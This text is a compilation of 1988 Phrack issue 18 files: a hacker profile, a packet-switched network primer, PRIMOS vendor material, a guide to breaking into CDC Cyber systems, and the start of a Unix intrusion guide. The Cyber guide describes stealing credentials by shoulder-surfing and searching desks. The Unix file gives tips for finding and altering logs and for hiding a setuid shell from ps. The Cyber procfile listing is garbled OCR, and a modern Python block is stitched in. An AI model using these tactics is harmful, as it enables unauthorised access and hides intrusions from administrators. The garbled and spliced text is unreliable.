==Phrack Inc.==
Volume Two, Issue 18, Phile #2 of 11 
==Phrack Pro-Phile XI== 
Written and Created by Crimson Death 
Welcome to Phrack Pro-Phile XI. Phrack Pro-Phile is created to bring info
to you, the users, about old or highly important/controversial people. This
month, I bring to you a name familiar to most in the BBS world...


Ax Murderer 


Ax Murderer is popular to many of stronger names in the P/H community. 


Personal 
Handle: Ax Murderer 
Call him: Mike 
Past handles: None 
Handle origin: Thought of it while on CompuServe. 


Date of Birth: 10/04/72 
Age at current date: 15 
Height: 6’ 2”
Weight: 205 Lbs. 
Eye color: Brown 
Hair Color: Brown 
Computers: IBM PC, Apple II+, Apple IIe 
Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn 


Ax Murderer started phreaking and hacking in 1983 through the help of some 
of his friends. Members of the Hack/Phreak world which he has met include 
Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack 
BBS’s he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn, 
Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland. 
His phreaking and hacking knowledge came about with a group of people in which 
some included Forest Ranger and The Timelord. 


Ax Murderer is a little more interested in Phreaking than hacking. He 
does like to program however, he can program in ’C’, Basic, Pascal, and 
Machine Language. 


The only group in which Ax Murderer has been in is Phoneline Phantoms. 


Interests: Telecommunications (Modeming, phreaking, hacking, 
programming), football, track, cars, and music. 


Ax Murderer’s Favorite Thing 


His car... (A Buick Grand National) 
His girlfriend... (Sue)
Rock Music 


Most Memorable Experiences 


Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial) 


Some People to Mention 


Forest Ranger (For introducing me to everyone and getting me on Dragon Fire) 
Taran King (For giving me a chance on MSP and the P/H world) 
Mind Bender (For having ANY utilities I ever needed)
The Necromancer (Getting me my Apple’cat) 
The Titan (Helping me program the BBS) 


All for being friends and all around good people and phreaks. 


Ax Murderer is out and out against the idea of the destruction of data. 
He hated the incident with MIT where the hackers were just hacking it to 
destroy files on the system. He says that it ruins it for everyone else
and gives ‘True Hackers’ a bad name. He hates it when people hack to destroy,
Ax has no respect for anyone who does this today. Where have all the good 
times gone? 


I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming 
in the near future.... And now for the regularly taken poll from all 
interviewees. 


Of the general population of phreaks you have met, would you consider most 
phreaks, if any, to be computer geeks? "No, not really." Thanks Mike. 


Crimson Death 
Sysop of The Forgotten Realm 

==Phrack Inc.==

Volume Two, Issue 18, Phile #3 of 11

An Introduction To Packet Switched Networks

Written By Epsilon - Revised 05/3/88


In the past few years, Packet Switched Networks have become a prominent 
feature in the world of telecommunications. These networks have provided ways 
of communicating with virtually error-free data, over very large distances. 
These networks have become an imperative to many a corporation in the business 
world. In this file we will review some of the basic aspects of Packet 
Switched Networks. 


Advantages -
The Packet Switched Network has many advantages to the common user, and 
even more to the hacker, which will be reviewed in the next topic. 


The basis of a Packet Switched Network is the Packet Switch. This network 
enables the service user to connect to any number of hosts via a local POTS
dial-up/port. The various hosts pay to be connected to this type of network, 
and that’s why there is often a surcharge for connection to larger public 
services like Compuserve or The Source. 


A Packet Switched Network provides efficient data transfer and lower rates 
than normal circuit switched calls, which can be a great convenience if you 
are planning to do a lot of transferring of files between you and the host. 


Not only is the communication efficient, it is virtually error free. 
Whereas in normal circuit switched calls, there could be a drastic increase in 
errors, thus creating a bad transfer of data. 


When using a Packet Switched Network, it is not important that you 
communicate at the same baud rate as your host. A special device regulates 
the speed so that the individual packets are sped up or slowed down, according 
to your equipment. Such a device is called a PAD (Packet Assembler 
Disassembler). 


A PSN also provides access to a variety of information and news retrieval 
services. The user pays nothing for these calls, because the connections are 
collect. Although the user may have to subscribe to the service to take 
advantage of its services, the connection is usually free, except for a
surcharge on some of the larger subscription services. 


Advantages To Hackers - 

Packet Switched Networks, to me, are the best thing to come along since the 
phone system. I’m sure many other hackers feel the same way. One of the 
reasons for this opinion is that when hacking a system, you need not dial out 
of your LATA, using codes or otherwise. 


Now, the hacker no longer has to figure out what parameters he has to set 
his equipment to, to communicate with a target computer effectively. All 
PSSes use the same protocol, set by international standards. This protocol is 
called X.25. This protocol is used on every network-to-network call in the
world. 


When operating on a packet switch, you are not only limited to your own 
network (As if that wasn’t enough already). You can access other PSSes or 
private data networks through gateways which are implemented in your PSN. 
There are gateways to virtually every network, from virtually every other 
network, except for extremely sensitive or private networks, which
would probably be completely isolated from remote access.


Another advantage with PSNs is that almost everyone has a local port, which 
means if you have an outdial (Next paragraph), you can access regular circuit 
switched hosts via your local Packet Switched Network port. Since the ports 
are local, you can spend as much time as you want on it for absolutely no 
cost. So think about it. Access to any feasible network, including overseas 
PSNs and packet switches, access to almost any host, access to normal circuit 
switched telephone-reachable hosts via an outdial, and with an NUI (Network 
User Identity - Login and password entered at the @ prompt on Telenet), 
unlimited access to any NUA, reverse-charged or not. 


Due to the recent abuse of long distance companies, the use of codes when 
making free calls is getting to be more and more hazardous. You may ask, ‘Is 
there any resort to making free calls without using codes, and without using a 
blue box?’ The answer is yes, but only when using data. With an outdial, 
accessible from your local PSN port, you can make data calls with a remote 
modem, almost always connected directly to a server, or a port selector. This 
method of communicating is more efficient, safer, and more reliable than using 
any code. Besides, with the implementation of equal access, and the 
elimination of 950 ports, what choice will you have? 


Some Important Networks - 


As aforementioned, PSNs are not only used in the United States. They are 
all over the place. In Europe, Asia, Canada, Africa, etc. This is a small 
summary of some of the more popular PSNs around the world. 


Country          Network Name     *DNIC
Germany          Datex-P          2624
Canada           Datapac          3020
Italy            Datex-P          0222
South Africa     Saponet          0655
Japan            Venus-P          4408
England          Janet/PSS        2342
USA              Tymnet           3106
USA              Telenet          3110
USA              Autonet          3126
USA              RCA              314.3
Australia        Austpac          0505
Ireland          Irepac           2724
Luxembourg       Luxpac           2704
Singapore        Telepac          5252
France           Transpac         2080
Switzerland      Telepac          2284
Sweden           Telepac          2405
Israel           Isranet          4251

* - DNIC (Data Network Identification Code)
    Precede DNIC and logical address with a
    ‘0’ when using Telenet.


Notes On Above Networks - 


Some countries may have more than one Packet Switching Network. The ones 
listed are the more significant networks for each country. For example, the 
United States has eleven public Packet Switching Networks, but the four I 
listed are the major ones. 

Several countries may also share one network, as shown above. Each country
will have equal access to the network using the basic POTS dial-up ports. 


Focus On Telenet -


Since Telenet is one of the most famous, and highly used PSNs in the United 
States, I thought that informing you of some of the more interesting aspects 
of this network would be beneficial. 


Interconnections With Other Network Types - 


Packet Switched Networks are not the only type of networks which connect a 
large capacity of hosts together. There are also Wide Area Networks, which 
operate on a continuous link basis, rather than a packet switched basis. 
These networks do not use the standardized X.25 protocol, and can only be 
reached by direct dial-ups, or by connecting to a host which has network 
access permissions. The point is, that if you wanted to reach, say, Arpanet 
from Telenet, you would have to have access to a host which is connected to 
both networks. This way, you can connect to the target host computer via 
Telenet, and use the WAN via the target host. 


WANs aren’t the only other networks you can access. Also, connections to 
other small, private, interoffice LANs are quite common and quite feasible. 


Connections To International NUAs via NUIs - 


When using an NUI, at the prompt, type 0+DNIC+NUA. After your connection
is established, proceed to use the system you’ve reached.
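
As an added illustration (not part of the original file), the Python below parses the "0" + DNIC + NUA form described above and uses this page's DNIC table to sort constructed PAD call records by destination network, the kind of review a network operator would run over accounting data. The record layout, the NUI labels, the sample addresses and the choice of Telenet as the home network are assumptions; the 14-digit limit is the X.121 maximum.

```python
import re

# DNIC -> (country, network), copied from the table on this page. The RCA row
# is omitted because its code is not legible as four digits in this copy.
DNIC_TABLE = {
    "2624": ("Germany", "Datex-P"),
    "3020": ("Canada", "Datapac"),
    "0222": ("Italy", "Datex-P"),
    "0655": ("South Africa", "Saponet"),
    "4408": ("Japan", "Venus-P"),
    "2342": ("England", "Janet/PSS"),
    "3106": ("USA", "Tymnet"),
    "3110": ("USA", "Telenet"),
    "3126": ("USA", "Autonet"),
    "0505": ("Australia", "Austpac"),
    "2724": ("Ireland", "Irepac"),
    "2704": ("Luxembourg", "Luxpac"),
    "5252": ("Singapore", "Telepac"),
    "2080": ("France", "Transpac"),
    "2284": ("Switzerland", "Telepac"),
    "2405": ("Sweden", "Telepac"),
    "4251": ("Israel", "Isranet"),
}

HOME_DNIC = "3110"      # assumption: the records come from a Telenet PAD
MAX_X121_DIGITS = 14    # X.121: 4-digit DNIC plus at most 10 further digits


def parse_address(raw):
    """Split a called address into its parts.

    "0" + DNIC + NUA is the international form from the page. Anything else
    is treated as a home-network address whose first three digits are the
    prefix. Raises ValueError for input that fits neither form.
    """
    digits = re.sub(r"[ .-]", "", raw)
    if not re.fullmatch(r"[0-9]+", digits):
        raise ValueError("address must contain digits only: %r" % raw)
    if digits.startswith("0"):
        body = digits[1:]
        # A DNIC alone is not an address, and X.121 caps the total length.
        if not 4 < len(body) <= MAX_X121_DIGITS:
            raise ValueError("expected 0 + 4-digit DNIC + NUA: %r" % raw)
        dnic, nua = body[:4], body[4:]
        return {"form": "international", "dnic": dnic, "nua": nua,
                "network": DNIC_TABLE.get(dnic)}
    if not 4 <= len(digits) <= MAX_X121_DIGITS - 4:
        raise ValueError("expected 3-digit prefix + host number: %r" % raw)
    return {"form": "domestic", "dnic": HOME_DNIC, "prefix": digits[:3],
            "nua": digits, "network": DNIC_TABLE[HOME_DNIC]}


def review_calls(records):
    """Return (nui, address, reason) for every record that needs a look."""
    findings = []
    for _when, nui, address in records:
        try:
            parsed = parse_address(address)
        except ValueError:
            findings.append((nui, address, "malformed"))
            continue
        if parsed["network"] is None:
            findings.append((nui, address, "unknown-dnic"))
        elif parsed["dnic"] != HOME_DNIC:
            country, network = parsed["network"]
            findings.append((nui, address, "foreign:%s/%s" % (country, network)))
    return findings


# Constructed accounting records: (timestamp, NUI label, called address).
SAMPLE_CALLS = [
    ("88/05/03 09.12.44", "NUI-A", "212 141"),        # home network, prefix 212
    ("88/05/03 09.15.02", "NUI-A", "0311021200141"),  # home network, long form
    ("88/05/03 23.40.10", "NUI-B", "0262445890040"),  # DNIC 2624
    ("88/05/03 23.41.55", "NUI-B", "0999912345"),     # DNIC not in the table
    ("88/05/03 23.43.00", "NUI-B", "02624"),          # DNIC with no NUA
]

if __name__ == "__main__":
    for finding in review_calls(SAMPLE_CALLS):
        print(finding)
```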


Private Data Networks - 


Within the large Packet Switched Networks that are accessible to us there 
are also smaller private networks. These networks can sometimes be very 
interesting as they may contain many different systems. A way to identify a 
private network is by looking at the three digit prefix. Most prefixes 
accessible by Telenet are based on area codes. Private networks often have a 
prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144) 
Those prefixes are not real networks, just examples. 


Inside these private networks, there are often smaller networks which are 
connected with some type of host selector or gateway server. If you find 
something like this, there may be hosts that can be accessed only by this port 
selector/server, and not by the normal prefix. It is best to find out what 
these other addresses translate to, in case you are not able to access the 
server for some reason. That way, you always have a backup method of reaching 
the target system (Usually the addresses that are accessed by a gateway 
server/port selector translate to normal NUAs accessible from your Telenet 
port). 


When exploring a private network, keep in mind that since these networks 
are smaller, they would most likely be watched more closely during business 
hours than, say, Telenet or Tymnet. Try to keep your scanning and tinkering
down to a minimum on business hours to avoid any unnecessary trouble. 
Remember, things tend to last longer if you don’t abuse the hell out of them. 


Summary -


I hope this file helped you out a bit, and at least gave you a general idea 
of what PSNs are used for, and some of the advantages of using these networks. 
If you can find something interesting during your explorations of PSNs, or 
Private Data Networks, share it, and spread the knowledge around. Definitely 
exploit what you’ve found, and use it to your advantage, but don’t abuse it. 


If you have any questions or comments, you can reach me on -


The FreeWorld II/Central Office/Forgotten Realm/TOP. 

I hope you enjoyed my file. Thanks for your time. I should be writing a
follow up article to this one as soon as I can. Stay safe..

- Epsilon

- Thanks To -

Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist

==Phrack Inc.==

Volume Two, Issue 18, Phile #4 of 11

PRIMOS: NETWORK COMMUNICATIONS
PRIMENET, RJE, DPTX

Presented by Magic Hasan June 1988


PRIME’s uniform operating system, PRIMOS, supports a wide range of 
communications products to suit any distributed processing need. The PRIMENET 
distributed networking facility provides complete local and remote network 
communication services for all PRIME systems. PRIME’s Remote Job Entry (RJE)
products enable multi-user PRIME systems to emulate IBM, CDC, Univac, 
Honeywell and ICL remote job entry terminals over synchronous communication 
lines. PRIME’s Distributed Processing Terminal Executive (DPTX) allows users 
to construct communication networks with PRIME and IBM-compatible equipment. 




PRIMENET provides complete local and remote network communication services
for all PRIME systems. PRIMENET networking software lets a user or process on
one PRIME system communicate with any other PRIME system in the network
without concern for any protocol details. A user can log in to any computer
in the network from any terminal in the network. With PRIMENET networking
software, processes running concurrently on different systems can communicate
interactively. PRIMENET allows transparent access to any system in the
network without burdening the user with extra commands.


PRIMENET has been designed and implemented so that user interface is simple
and transparent. Running on a remote system from a local node of the network
or accessing remote files requires no reprogramming of user applications or
extensive user training. All the intricacies and communication protocols of
the network are handled by the PRIMENET software. For both the local and
remote networks, PRIMENET will allow users to share documents, files, and
programs and use any disk or printer configured in the network.




For a local network between physically adjacent systems, PRIME offers the 
high-performance microprocessor, the PRIMENET Node Controller (PNC). The 
controller uses direct memory access for low overhead and allows loosely
coupled nodes to share resources in an efficient manner. The PNCs for each 
system are connected to each other with a coaxial cable to form a high-speed 
ring network, with up to 750 feet (230 meters) between any two systems. 


Any system in the PNC ring can establish virtual circuits with any other 
system, making PNC-based networks "fully connected" with a direct path between 
each pair of systems. The ring has sufficient bandwidth (1 MB per second) and 
addressing capability to accommodate over 200 systems in a ring structure; 
however, PRIMENET currently supports up to sixteen systems on a ring to 
operate as a single local network. 


The PRIMENET Node Controller is designed to assure continuity of operation 
in the event that one of the systems fails. One system can be removed from 
the network or restored to on-line status without disturbing the operations of 
the other system. An active node is unaware of messages destined for other 
nodes in the network, and the CPU is notified only when a message for that 
node has been correctly received. 


Synchronous communications over dedicated leased lines or dial-up lines is 

1) The User does not need to understand the detailed
mechanisms of communications software in order to 
communicate. 

2) Calls are device-independent. The same program will 
work over physical links implemented by the local node 
controller (local network), leased lines, or a packet 
network. 

3) Programs on one system can concurrently communicate 
with programs on other systems using a single 
communications controller. PRIMENET handles all 
multiplexing of communications facilities. 

4) A single program can establish multiple virtual 
circuits to other programs in the network. 

PRIMENET’s ITS facility allows an interactive terminal to have access to
any machine in the network. This means that terminals can be connected into
an X.25 packet network along with PRIME computers. Terminal traffic between
two systems is multiplexed over the same physical facilities as inter-program
data, so no additional hardware is needed to share terminals between systems.
This feature is ordinarily invisible to user programs, which cannot
distinguish data entering via a packet network from data coming in over AMLC
lines. A variant of the IPCF facility allows users to include the terminal
handling protocol code in their own virtual space, thus enabling them to
control multiple terminals on the packet network within one program.

Terminals entering PRIMOS in this fashion do not pass through the usual log-in 
facility, but are immediately connected to the application program they 
request. (The application program provides whatever security checking is 
required.) 


The result is the most effective available means to provide multi-system 
access to a single terminal, with much lower costs for data communications and 
a network which is truly available to all users without the expense of 
building a complicated private network of multiplexors and concentrators. 


By utilizing PRIMENET’s File Access Manager (FAM), programs running under 
PRIMOS can access files on other PRIME systems using the same mechanisms used 
to access local files. This feature allows users to move from a single-system 
environment to a multiple-system one without difficulty. When a program and 
the files it uses are separated into two (or more) systems the File Access 
Management (FAM) is automatically called upon whenever the program attempts to
use the file. Remote file operations are logically transparent to the user 
or program. 


When a request to locate a file or directory cannot be satisfied locally,
the File Access Manager is invoked to find the data elsewhere in the network.
PRIMOS initiates a remote procedure call to the remote system and suspends the
user. This procedure call is received by an answering slave process on the
remote system, which performs the requested operation and returns data via
subroutine parameters. The slave process on the remote system is dedicated to
its calling master process (user) on the local system until released. A
master process (user) can have a slave process on each of several remote
systems simultaneously. This means that each user has a dedicated connection
for the duration of the remote access activity so many requests can be
handled in parallel.


FAM operation is independent of the specific network hardware connecting 
the nodes. There is no need to rewrite programs or learn new commands when 
moving to the network environment. Furthermore, the user need only be 
logged-in to one system in the network, regardless of the location of the 
file. Files on the local system or remote systems can be accessed dynamically 
by file name within a program, using the language-specific open and close 
statements. No external job control language statements are needed for the 
program to access files. Inter-host file transfers and editing can be 
performed using the same PRIMOS utilities within the local system by 
referencing the remote files with their actual file names. 


REMOTE JOB ENTRY 


PRIME’s Remote Job Entry (RJE) software enables a PRIME system to emulate
IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
synchronous communication lines. PRIME’s RJE provides the same communications
and peripheral support as the RJE terminals they emulate, appearing to the
host processor to be those terminals. All PRIME RJE products provide three
unique benefits:

* PRIME RJE is designed to communicate with multiple
  remote sites simultaneously.

* PRIME RJE enables any terminal connected to a PRIME system to
  submit jobs for transmission to remote processors, eliminating the
  requirement for dedicated terminals or RJE stations at each
  location.

* PRIME’s mainframe capabilities permit concurrent running of RJE
  emulators, program development and production work.


PRIME’s RJE supports half-duplex, point-to-point, synchronous 
communications and operates over dial-up and dedicated lines. It is fully 

DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)

PRIME’s Distributed Processing Terminal Executive (DPTX) allows users to
construct communication networks with PRIME and IBM-compatible equipment.
DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
into networks containing IBM mainframes, terminals and printers without
changing application code or access methods and operates under the PRIMOS
operating system.


DPTX is compatible with all IBM 370 systems and a variety of access methods
and teleprocessing monitors: BTAM, TCAM, VTAM, IMS/VS, CICS/VS, and TSO. They
provide transmission speeds up to 9600 bps using IBM’s Binary Synchronous
Communications (BSC) protocol.


DPTX is comprised of three software modules that allow PRIME systems to
emulate and support IBM or IBM compatible 3271/3277 Display Systems. One
module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
emulate the operation of a 3271 on the IBM system. This enables both terminal
user and application programs (interactive or batch) on the PRIME System to
reach application programs on an IBM mainframe. A second module, Terminal
Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
3271/3277 devices. This enables terminal users to reach application programs
on a PRIME computer. The third module, Transparent Connect Facility
(DPTX/TCF), combines the functions of modules one and two with additional
software allowing 3277 terminal users to reach programs on an IBM mainframe,
even though the terminal subsystem is physically connected to a PRIME system,
which is connected to an IBM system.


PRIMOS offers a variety of different Communication applications. Being
able to utilize these applications to their fullest extent can make life easy
for a Primos "enthusiast." If you’re a beginner with Primos, the best way to
learn more, as with any other system, is to get some "hands-on" experience.
Look forward to seeing some beginner PRIMOS files in the near future. --MH

Special thanks to PRIME INC. for unwittingly providing the text for this
article.

==Phrack Inc.==

Volume Two, Issue 18, Phile #5 of 11

-= Hacking Control Data Corporation’s Cyber =-

-= Written by Phrozen Ghost, April 23, 1988 =-

-= Exclusively for Phrack Magazine =-


This article will cover getting into and using NOS (Networking Operating 
System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run 
this operating system so I will just refer to this environment as Cyber.
Also, Cyber is a slow and outdated operating system that is primarily used 
only for college campuses for running compilers. First off after you have 
scanned a bunch of carriers you will need to know how Cyber identifies itself. 
It goes like this: 


WELCOME TO THE NOS SOFTWARE SYSTEM. 
COPYRIGHT CONTROL DATA 1978, 1987. 


88/02/16. 02.36.53. N265100 
CSUS CYBER 170-730. NOS 2.5.2-678/3. 
FAMILY: 


You would normally just hit return at the family prompt. Next prompt is: 


USER NAME: 


Usernames are in the format abcdxxx where a is the location of where the
account is being used from (A-Z). The b is a grouping specifying privs and
limits for the account - usually A-G - where A is the lowest access. Some
examples of how they would be used in a college system:

A = lowest access - class accounts for students
B = slightly higher than A (for students working on large projects)
C = Much higher limits, these accounts are usually not too hard to get and
    they will normally last a long time! Lab assistants use these.
D = Instructors, Lecturers, Professors... etc..
E = same... (very hard to get these!)


The C and D positions are usually constant according to the groupings.
For example, a class would have accounts ranging from NADRAAA-AZZ. The last
three characters (AAA through AZZ here) can also be digits.

There are also special operator accounts which start with digits instead of
letters. (ie 7ETPDOC) These accounts can run programs such as the monitor
which can observe any tty connected to the system...


The next prompt will be for the password, student account passwords cannot be 
changed and are 7 random letters by default, other account passwords can be 
changed. You get 3 tries until you are logged out. It is very difficult if 
not impossible to use a brute force hacker or try to guess someone’s account... 
so how do you get on? Here’s one easy way... Go down to your local college 
(make sure they have a Cyber computer!) then just buy a class catalog (they 
only cost around 50 cents) or you could look, borrow, steal someone else’s... 
then find a pascal or fortran class that fits your schedule! You will only 
have to attend the class 3 or 4 times max. Once you get there you should have 
no trouble, but if the instructor asks you questions about why you are not on 
the roll, just tell him that you are auditing the class (taking it without 
enrolling so it won’t affect your GPA). The instructor will usually pass out 
accounts on the 3rd or 4th day of class.. this method also works well with 
just about any system they have on campus! Another way to get accounts is to 
go down to the computer lab and start snooping! Look over someone’s shoulder 
while they type in their password, or look thru someone’s papers while they’re
in the bathroom, or look thru the assistants desk while he is helping 
someone... (I have acquired accounts both ways, and the first way is a lot 
easier with less hassles) Also, you can use commas instead of returns when 
entering username and password. 
Example: at the family prompt, you could type ,nadrajf,dsfgkcd 

or at the username prompt nadrajf,dsfgkcd 


After you enter your info, the system will respond with: 


JSN: APXV, NAMIAF 
/ 


The ’APXV, NAMIAF’ could be different depending on what job you were attached 
to. The help program looks a lot neater if you have vt100 emulation, if you 
do, type [screen,vt100] (don’t type the brackets! from now on, all commands I 
refer to will be enclosed in brackets) Then type help for an extensive 
tutorial or a list of commands. Your best bet at this point is to buy a quick 
reference guide at the campus because I am only going to describe the most 
useful commands. The / means you are in the batch subsystem, there are usually 
6 or 7 other subsystems like basic, fortran, etc... return to batch mode by 
typing [batch]. 


Some useful commands: 


CATLIST    - will show permanent files in your directory.
ENQUIRE,F  - displays temporary files in your workspace.
LIMITS     - displays your privileges.
INFO       - get more on-line help.
R          - re-execute last command.
GET,fn     - loads fn into the local file area.
CHANGE     - change certain specs on a file.
PERMIT     - allow other users to use one of your files.
REWIND,*   - rewinds all your local files.
NEW,fn     - creates new file.
PURGE      - deletes files.
LIST,F=fn  - list file.
UPROC      - create an auto-execute procedure file.
MAIL       - send/receive private mail.
BYE        - logoff.

Use the [helpme,cmd] command for the exact syntax and parameters of these
commands. There are also several machine specific ’application’ programs such
as pascal, fortran, spitbol, millions of others that you can look up with the
INFO command... there are also the text editors; edit, xedit, and fse (full
screen editor). Xedit is the easiest to use if you are not at a Telray 1061
terminal and it has full documentation. Simply type [xedit,fn] to edit the
file ’fn’.


Special control characters used with Cyber: 


Control S and Control Q work normally, the terminate character is Control T
followed by a carriage return. If you wanted to break out of an auto-execute
login program, you would have to hit ^T C/R very fast and repetitively in
order to break into the batch subsystem. Control Z is used to set environment
variables and execute special low level commands, example: [^Z TM C/R] this
will terminate your connection...


So now you’re thinking, what the hell is Cyber good for? Well, they won’t 
have any phone company records, and you can’t get credit information from one, 
and I am not going to tell you how to crash it since crashing systems is a 
sin. There are uses for a Cyber though, one handy use is to set up a chat 
system, as there are normally 30-40 lines going into a large university Cyber 
system. I have the source for a chat program called the communicator that I 
will be releasing soon. Another use is some kind of underground information 
exchange that people frequently set up on other systems, this can easily be 
done with Cyber. 

Procedure files:


A procedure file is similar to a batch file for MS-DOS, and a shell script for
UNIX. You can make a procedure file auto-execute by using the UPROC command
like [uproc,auto] will make the file ‘auto’, auto execute. There is also a
special procedure file called the procfile in which any procedure may be
accessed by simply putting a - in front of it. If your procfile read:

.proc,cn.
.* sample procedure
$catlist/un=7etpdoc.
$exit.


then you could simply type -cn at the / prompt and it would execute the
catlist command. Now back to uprocs, you could easily write a whole BBS in a
procedure file or say you wanted to run a chat system and you did not want
people to change the password on your account, you could do this:

.proc,chat,
PW"Password: "=(*A).
$ife,PW="cyber",yes.
   $chat.
   $revert.
   $bye.
$else,yes.
   $note./Wrong password, try again/.
   $revert.
   $bye.
$endif,yes.


This procedure will ask the user for a password and if he doesn’t type "cyber" 
he will be logged off. If he does get it right then he will be dumped into 
the chat program and as soon as he exits the chat program, he will be logged 
off. This way, the user cannot get into the batch subsystem and change your 
password or otherwise screw around with the account. The following is a 
listing of the procfile that I use on my local system, it has a lot of handy
utilities and examples... 


----- Cut here -----

.PROC,B.
.******BYE******
$DAYFILE.
$NOTE.//////////////////////////
$BYE.
$REVERT,NOLIST.
#EOR
.PROC,TIME.
.******GIVES DAY AND TIME******
$NOTE./THE CURRENT DAY AND TIME IS/
$FIND,CLOCK./
$REVERT,NOLIST.
#EOR
.PROC,SIGN*I,IN.
.******SIGN PRINT UTILITY******.
$GET,IN.
$FIND,SIGN,#I=IN,#L=OUT.
$NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/
$REVERT,NOLIST.
#EOR
.PROC,TA.
.******TA******
$FIND,AID,COMM.
$REVERT,NOLIST.
#EOR

.PROC,DIR,UN=,FILE=.
.******DIRECTORY LISTING OF PERMANENT FILES******
$GET(ZZZZDIR=CAT/#UN=LGTLOCL)
ZZZZDIR(FILE,#UN=UN)
$CATLIST.
$RETURN(ZZZZDIR)
$REVERT,NOLIST.


‘EN TO Z1LQEKKKK 


OQ *RO 
* 
f+ 
* | + 
* 
n 
| 
n 
Q 
vs) 


TE. /SCREEN, 219. 


5 


KKKKSORT SCR 
REEN, VT100. 
‘EN, VT100. 
VERT, NOLIST 

R 


EN TO VI1O00****** 


[e) 
4 

74 
aay 
n 
Q 
ve) 


EN TO T10****** 


ON *RDOE 
* 
“He + 
. ws 
* 
n 
HA 
n 
Q 
ve) 


OF 
Bw 


ROC,C. 


AKKAKKCATLIST****** 


EVERT,NOLIST. 


(eo) 
yD 


ROC, CA. 
*xXX*X*XCATLIST, LO=F****** 
LIST, LO=F. 
ERT,NOLIST. 


< 


ROC, MT. 


KKKKKBBGKKKKKK 


ACFIND,AID,MTAB. 


EVERT, NOLIST. 
R 
ROC, LT, FILE=, 
KKKKKTTST FILE****x** 
ET, FILE. 

Serr. 
PY (FILE) 
EVER 


(e) 


) 


ET (QQOF LLE=ENQF/UN=1GTLOCL) 


[ (NORMAL) 
ERT,NOLIST. WHERE IS THAT FILE?? 


C, LOCAL. 
*****XDTRECTORY OF LOCAL FILES****** 
TURN (PROCLIB, YYYYBAD, YYYYPRC) 


ILE. 


ERT,NOLIST. 


X 


* 


F 
V 
I 
VERT. FILES ERROR 
R 
O 


C,RL. 


*****RATSE LIMITS****** 


$SETASL (*) 


$ 


S) 


ETISL(*) 


SSETTL(*) 


SCSI 
SNOTE./ Limits now at max validated levels. 
CSET (NORMAL) 


$ 
$ 
# 


E 


[T (ASCIT) 


R 


EVERT,NOLIST. 


HO. EE] 


OR 


ROC, CL. 
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a KxkKkKK*K*XCLEAR****** 

SCLEAR, *. 
SCSET (ASCIT) 
SNOTE./LOCAL FILE AREA CLEARED 
EVERT, NOLIST. 
R 
ROC, P, FILE=THING, LST=LIST. 
* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK KKK 


(e) 


1 
[tT] 
> 
ve) 


ASCAL4, FILE, LST. 


wn 
i 

> 
n 
Q 
Hi 
H 


$+tONUMMMNUMYNHNUMNYNs 


DPaAWDAQDA *+UVUADAZAQAD +10 e POQQDHAAVHAAQA*VEAD 


+e eR RAE DERE 
EWIND,*. 
SET (ASCIT) 
OTE. /REWOUND. 
EVERT,NOLIST. 
R 


+$+OM MMs 


ROC, FOR, FILE, LST=LIST. 
* 


KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


SET (ASCIT) 
VERT. Fortran Compiled 
a 


OPY (LST) 
EVERT. That’s all folks. 
R 


+tOUMMMMNUMNYHNUNNYN: 


ROC, WAR. 

**** KWARBLES****** 
ACFIND,AID,WAR. 
EVERT,NOLIST. 

R 
ROC,M. 
**** MATL /CHECK* * **** 
AAIL/CHECK. 
EVERT,NOLIST. 


e) 


HMMs + HMMs - 
*UMBaDE + VADN + VADOADE 


**X**X*XEPNTER MAIL****** 


+7 > 


PROC, HE, FILE=SUMPROC, UN=. 


*AKAKKHELP FILE* KEKE 


ERT,NOLIST. 


U B DHAWAN +t VAWDE 

Bs) 4 < 
[ 

Hi 

4 

oe 

HE 

ce 

T 

(as) 

Zz 


PROC, DYNAMO. 
_***KKKKWHO KNOWS? 2****** 
SGET, DYNMEXP/UN=7ETPDOC. 
SSKIPR, DYNME 
SCOPYBR, DYNM 
SFIND, DYNAMO, GO. 
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SREVERT,NOLIST. 

EOR 

EOR 

EOL 

Sse) Cub here: <== 

I have covered procfil’s fairly extensively as I think it is the most useful 
function of Cyber for hackers. I will be releasing source codes for several 
programs including ‘the communicator’ chat utility, and a BBS program with a 
full message base. If you have any questions about Cyber or you have gotten 
into one and don’t know what to do, I can be contacted at the Forgotten Real 
BBS or via UUCP mail at ...!uunet!ncoast!ghost. 


Phrozen Ghost 


==Phrack Inc.== 


Volume Two, Issue 18, Phile #6 of 11 


Unix for the Moderate 


By: The Urvile, Necron 99, and a host of me. 


Disclaimer: 


This is mainly for system five. I do reference BSD occasionally, but I 
mark those. All those little weird brands (i.e., DEC’s Ultrix, Xenix, and 
so on) can go to hell. 


Security: (Improving yours.) 


-Whenever logging onto a system, you should always do the following: 
$ who -u 
$ ps -ef 
$ ps -u root 

or BSD: 

$ who; w; ps uaxg 
This prints out who is on, who is active, what is going on presently, 
everything in the background, and so on. 


And the ever popular: 

$ find / -name "*log*" -print 
This lists out all the files with the name ’log’ in it. If you do find a 
process that is logging what you do, or an odd log file, change it as soon 
as you can. 


If you think someone may be looking at you and you don’t want to leave 
(Useful for school computers) then go into something that allows shell 
breaks, or use redirection to your advantage: 

$ cat < /etc/passwd 
That puts ’cat’ on the ps, not ’cat /etc/passwd’. 


If you’re running a setuid process, and don’t want it to show up on a ps 
(Not a very nice thing to have happen), then: 

$ super_shell 
# exec sh 
Runs the setuid shell (super_shell) and puts something ‘over’ it. You may 
also want to run ’sh’ again if you are nervous, because if you break out of 
an exec’ed process, you die. Neat, huh? 


Improving your id: 


-First off, you should issue the command ’id’ & it will tell you your 
